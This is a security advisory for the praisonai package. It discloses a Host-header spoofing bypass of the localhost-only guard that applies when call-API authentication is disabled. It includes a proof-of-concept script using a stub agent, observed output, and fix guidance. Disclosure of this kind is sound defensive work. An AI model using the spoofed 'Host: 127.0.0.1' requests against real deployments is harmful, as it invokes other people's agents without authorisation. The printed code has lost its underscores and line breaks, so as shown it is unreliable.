GHSA-2gpf-2492-q9jh: High severity pip/praisonai vulnerability
Call API localhost-only authentication bypass via spoofed Host header
Summary
PraisonAI's patched PRAISONAICALLAUTH=disabled safeguard for the n8n/call agent invocation API can be bypassed with a spoofed Host: 127.0.0.1 header, allowing an unauthenticated network caller to list and invoke registered agents when the service is reachable and the opt-out is enabled.
Technical Details
The affected code is src/praisonai/praisonai/api/agentinvoke.py. verifytoken() is used as a FastAPI dependency for the /api/v1/agents routes, including POST /api/v1/agents/{agentid}/invoke. Current code no longer unconditionally skips authentication when PRAISONAICALLAUTH=disabled; it tries to allow that opt-out only for localhost binding:
python LOCALHOSTHOSTS = frozenset({'127.0.0.1', 'localhost', '::1'})
def bindhostfromrequest(request: Request) -> str: host = getattr(getattr(request, 'url', None), 'hostname', None) return host or os.getenv('PRAISONAICALLBINDHOST', '127.0.0.1')
async def verifytoken(request: Request, authorization: Optional[str] = Header(None)) -> None: if callauthdisabled(): bindhost = bindhostfromrequest(request) if bindhost not in LOCALHOSTHOSTS: raise HTTPException( statuscode=503, detail="PRAISONAICALLAUTH=disabled is only permitted for localhost binding", ) return
The violated invariant is that "localhost binding" must be a server-owned startup or socket property. The implementation instead reads request.url.hostname, which is derived from the HTTP Host header for the current request. A remote caller can therefore send Host: 127.0.0.1 and make the disabled-auth guard believe the request is for a localhost-bound service.
The protected sink is agent execution. After verifytoken() returns, invokeagent() retrieves the registered agent and calls agent.astart(request.message) or agent.start(request.message). The same router is mounted by the PraisonAI serve feature, which imports praisonai.api.agentinvoke, includes agentinvoke.router, and registers YAML agents into the same registry.
This is not a default-configuration exposure claim. The deployment must enable PRAISONAICALLAUTH=disabled and the API must be reachable over the network. The issue is that the patched safeguard intended to constrain that opt-out to localhost can be bypassed by client-controlled request metadata.
PoV
the PoV builds an in-process FastAPI app with the real agentinvoke.router, registers a harmless stub agent, and sends three no-token requests. The important input is the final request: it is modeled as an external client but sends Host: 127.0.0.1.
python disabledclient = TestClient(app, baseurl="http://external.example")
externalhost = disabledclient.get( "/api/v1/agents", headers={"host": "external.example"}, ) spoofedlocalhostlist = disabledclient.get( "/api/v1/agents", headers={"host": "127.0.0.1"}, ) spoofedlocalhostinvoke = disabledclient.post( "/api/v1/agents/pov-agent/invoke", headers={"host": "127.0.0.1"}, json={"message": "host-header-bypass"}, )
Expected secure behavior is for both no-token requests in disabled-auth mode to be rejected when the service is not actually loopback-only. Actual behavior rejects Host: external.example with 503, but accepts the spoofed localhost Host with 200 and invokes the stub agent.
The complete PoV script is in Appendix A.
PoC
Run from a PraisonAI checkout with the Appendix A script saved as povcallauthhostspoof.py:
bash git checkout v4.6.62 uv run --with fastapi --with httpx python povcallauthhostspoof.py .
Observed v4.6.62 output:
json { "disabledauthexternalhoststatus": 503, "disabledauthspoofedlocalhostinvokestatus": 200, "disabledauthspoofedlocalhostliststatus": 200, "failclosedwithouttokenstatus": 503, "repohead": "2a855c470077c7d2e2479a575f7ef7f548d51c33", "spoofedlocalhostinvokebody": { "metadata": { "agentid": "pov-agent", "messagelength": 18, "responselength": 33 }, "result": "stub-agent-ran:host-header-bypass", "sessionid": "default", "status": "success" }, "stubagentcalls": [ "host-header-bypass" ], "vulnerable": true }
Run the same script against current main:
bash git checkout 846568c7a5d8ce9e71e56e4c213f027c04909753 uv run --with fastapi --with httpx python povcallauthhostspoof.py .
Observed current-head output:
json { "disabledauthexternalhoststatus": 503, "disabledauthspoofedlocalhostinvokestatus": 200, "disabledauthspoofedlocalhostliststatus": 200, "failclosedwithouttokenstatus": 503, "repohead": "846568c7a5d8ce9e71e56e4c213f027c04909753", "spoofedlocalhostinvokebody": { "metadata": { "agentid": "pov-agent", "messagelength": 18, "responselength": 33 }, "result": "stub-agent-ran:host-header-bypass", "sessionid": "default", "status": "success" }, "stubagentcalls": [ "host-header-bypass" ], "vulnerable": true }
The negative controls are the first two status fields. With default authentication and no token, the API fails closed with 503. With PRAISONAICALLAUTH=disabled, an ordinary external Host is also rejected with 503. Only the spoofed localhost Host passes the guard and reaches agent execution.
Impact
An unauthenticated caller who can reach a PraisonAI call/serve API with PRAISONAICALLAUTH=disabled can bypass the intended localhost-only restriction by setting Host: 127.0.0.1. The PoV demonstrates both agent listing and direct invocation of a registered agent through /api/v1/agents/{agentid}/invoke.
Impact depends on the registered agents. In realistic deployments, agents may have tools, private context, workflow integrations, browser/file/API access, or paid model access. The same dependency also protects other agent registry routes, so the bypass undermines the access-control boundary for the mounted /api/v1/agents API family.
Suggested CWE: CWE-287 Improper Authentication and CWE-346 Origin Validation Error, with CWE-306 Missing Authentication for Critical Function also applicable to the bypassed protected action.
Suggested CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N (8.2). Confidentiality is scored Low because the PoV proves agent listing and invocation; higher confidentiality impact depends on deployed agents and their private context.
Suggested Fix
Do not derive bind safety from Request.url, the HTTP Host header, or any request-header-derived value. If PRAISONAICALLAUTH=disabled remains supported, decide whether it is allowed at startup from server-owned configuration, such as the actual configured bind host passed to Uvicorn or the serving command, and refuse to start in disabled-auth mode when the configured bind host is not loopback.
Consider removing the HTTP auth opt-out entirely for network routes, or replacing it with an explicit local-development mode that is only available when the process is bound to 127.0.0.1, localhost, or ::1.
Regression tests should exercise real ASGI requests rather than only synthetic request objects. Include a test where PRAISONAICALLAUTH=disabled, the modeled server configuration is non-loopback, and the request sends Host: 127.0.0.1; the expected result should be rejection before any agent list or invoke handler runs.
Affected Package/Versions
Affected package: praisonai on PyPI.
Confirmed affected:
- v4.6.62 at 2a855c470077c7d2e2479a575f7ef7f548d51c33 - current main at 846568c7a5d8ce9e71e56e4c213f027c04909753, version file still reporting 4.6.62
v4.6.60 had the older unconditional PRAISONAICALLAUTH=disabled bypass and is covered by a different public advisory. This report is for the patched guard shape present in v4.6.62 and current main. If v4.6.61 contains the same Host-derived guard, the affected lower bound likely starts there, but I could not confirm that tag locally.
Fixed version: unknown.
Advisory History
I checked the repository advisory list available through GitHub and found adjacent but distinct advisories:
- GHSA-86qc-r5v2-v6x6: call server unauthenticated agent listing/invocation/deletion when CALLSERVERTOKEN is unset in older releases. Current code fails closed when no token is configured; this report requires the patched PRAISONAICALLAUTH=disabled localhost guard and a spoofed Host header. - GHSA-8ccj-p46r-jwqq: PRAISONAICALLAUTH=disabled unconditionally disabled authentication in older releases and is listed as patched in >= 4.6.61. This report shows v4.6.62 and current main are still bypassable through the new guard because the guard trusts request.url.hostname. - GHSA-vmf9-xx9w-86wx: legacy SSE MCP transport accepts attacker Host/Origin and exposes registered tools through praisonaiagents.mcp.ToolsMCPServer.runsse(), /sse, and /messages/. That advisory affects praisonaiagents >= 0.6.0, < 1.6.58 and praisonai >= 3.10.0, < 4.6.58, with patches listed as praisonaiagents >= 1.6.59 and praisonai >= 4.6.59. This report targets a different package call path in praisonai.api.agentinvoke.verifytoken() and /api/v1/agents/{agentid}/invoke, confirmed in praisonai v4.6.62 and current main after the GHSA-vmf9 patched range. The preconditions are also different: GHSA-vmf9 is a browser/DNS-rebinding style Host/Origin issue against a local or internal legacy SSE MCP server, while this report requires PRAISONAICALLAUTH=disabled on the call/n8n agent API and bypasses its localhost-only opt-out guard with Host: 127.0.0.1; no browser Origin, DNS rebinding setup, SSE transport, or MCP tool server is involved. - GHSA-x8cv-xmq7-p8xp: AgentTeam.launch() unauthenticated API. That advisory covers praisonaiagents AgentTeam.launch() routes, not praisonai.api.agentinvoke.verifytoken(). - GHSA-5qw8-f2g9-ff29: Recipe server Typer command bypasses a non-localhost authentication guard. That is a different server and CLI path. This report targets the call API's Host-derived guard input.
No advisory I found describes Host-header spoofing against the patched PRAISONAICALLAUTH=disabled localhost guard in praisonai.api.agentinvoke.
References
- src/praisonai/praisonai/api/agentinvoke.py - src/praisonai/praisonai/cli/features/serve.py - GHSA-86qc-r5v2-v6x6: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-86qc-r5v2-v6x6 - GHSA-8ccj-p46r-jwqq: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8ccj-p46r-jwqq - GHSA-vmf9-xx9w-86wx: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-vmf9-xx9w-86wx - GHSA-x8cv-xmq7-p8xp: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x8cv-xmq7-p8xp - GHSA-5qw8-f2g9-ff29: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-5qw8-f2g9-ff29
Appendix A - Full PoV Script
python #!/usr/bin/env python3 """PoV for PraisonAI call API Host-header localhost guard bypass."""
from future import annotations
import importlib import json import os import sys from pathlib import Path from typing import Any
def reporoot() -> Path: if len(sys.argv) == 2: return Path(sys.argv[1]).resolve() return Path.cwd().resolve()
def loadagentinvoke(reporoot: Path, authdisabled: bool): os.environ.pop("CALLSERVERTOKEN", None) if authdisabled: os.environ["PRAISONAICALLAUTH"] = "disabled" else: os.environ.pop("PRAISONAICALLAUTH", None)
packageroot = reporoot / "src" / "praisonai" if not packageroot.exists(): raise SystemExit(f"missing PraisonAI package root: {packageroot}") packageroots = str(packageroot) if packageroots not in sys.path: sys.path.insert(0, packageroots)
import praisonai.api.agentinvoke as agentinvoke
agentinvoke = importlib.reload(agentinvoke) agentinvoke.agentregistry.clear() return agentinvoke
class StubAgent: def init(self) -> None: self.calls: list[str] = []
def start(self, message: str) -> str: self.calls.append(message) return f"stub-agent-ran:{message}"
def makeclient(agentinvoke: Any): from fastapi import FastAPI from fastapi.testclient import TestClient
app = FastAPI() app.includerouter(agentinvoke.router) return TestClient(app, baseurl="http://external.example")
def main() -> int: reporoot = reporoot()
failclosedmod = loadagentinvoke(reporoot, authdisabled=False) failclosedclient = makeclient(failclosedmod) failclosed = failclosedclient.get( "/api/v1/agents", headers={"host": "127.0.0.1"}, )
disabledmod = loadagentinvoke(reporoot, authdisabled=True) agent = StubAgent() disabledmod.registeragent("pov-agent", agent) disabledclient = makeclient(disabledmod)
externalhost = disabledclient.get( "/api/v1/agents", headers={"host": "external.example"}, ) spoofedlocalhostlist = disabledclient.get( "/api/v1/agents", headers={"host": "127.0.0.1"}, ) spoofedlocalhostinvoke = disabledclient.post( "/api/v1/agents/pov-agent/invoke", headers={"host": "127.0.0.1"}, json={"message": "host-header-bypass"}, )
result = { "repohead": git(reporoot, "rev-parse", "HEAD"), "failclosedwithouttokenstatus": failclosed.statuscode, "disabledauthexternalhoststatus": externalhost.statuscode, "disabledauthspoofedlocalhostliststatus": spoofedlocalhostlist.statuscode, "disabledauthspoofedlocalhostinvokestatus": spoofedlocalhostinvoke.statuscode, "spoofedlocalhostinvokebody": safejson(spoofedlocalhostinvoke), "stubagentcalls": agent.calls, }
expected = ( failclosed.statuscode == 503 and externalhost.statuscode == 503 and spoofedlocalhostlist.statuscode == 200 and spoofedlocalhostinvoke.statuscode == 200 and agent.calls == ["host-header-bypass"] ) result["vulnerable"] = expected print(json.dumps(result, indent=2, sortkeys=True)) return 0 if expected else 1
def safejson(response: Any) -> Any: try: return response.json() except Exception: return response.text
def git(reporoot: Path, args: str) -> str: import subprocess
return subprocess.checkoutput( ["git", "-C", str(reporoot), args], text=True, stderr=subprocess.DEVNULL, ).strip()
if name == "main": raise SystemExit(main())
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
pip/praisonaito a version that resolves this vulnerability.Fixed in 4.6.78 - Configuration
Derive localhost eligibility from server-owned startup or socket configuration, such as the actual Uvicorn or serving-command bind host, never from Request.url, the HTTP Host header, or other request-derived metadata; refuse to start in disabled-auth mode when the configured bind host is not loopback.
PraisonAI call/serve API PRAISONAI_CALL_AUTH = disabled only when the server is actually bound to 127.0.0.1, localhost, or ::1
Event History
Frequently Asked Questions
Which deployments are exposed?
Deployments are exposed when the call API is reachable over the network and PRAISONAI_CALL_AUTH is set to disabled. The affected routes include the /api/v1/agents endpoints, including agent invocation.
What does an attacker need to exploit this?
An attacker needs network access to the reachable service and can send a request with a spoofed Host header such as Host: 127.0.0.1. No authentication is required under the vulnerable configuration.
What can be done if patching is not immediately possible?
Do not enable PRAISONAI_CALL_AUTH=disabled on a service that is reachable from the network. Restrict network access to the service so untrusted callers cannot reach the agent API.
How can I determine whether my deployment is at risk?
Check whether PRAISONAI_CALL_AUTH is configured as disabled and whether the service can be reached by network callers. If both conditions apply, the localhost-only check can be bypassed through the request Host header.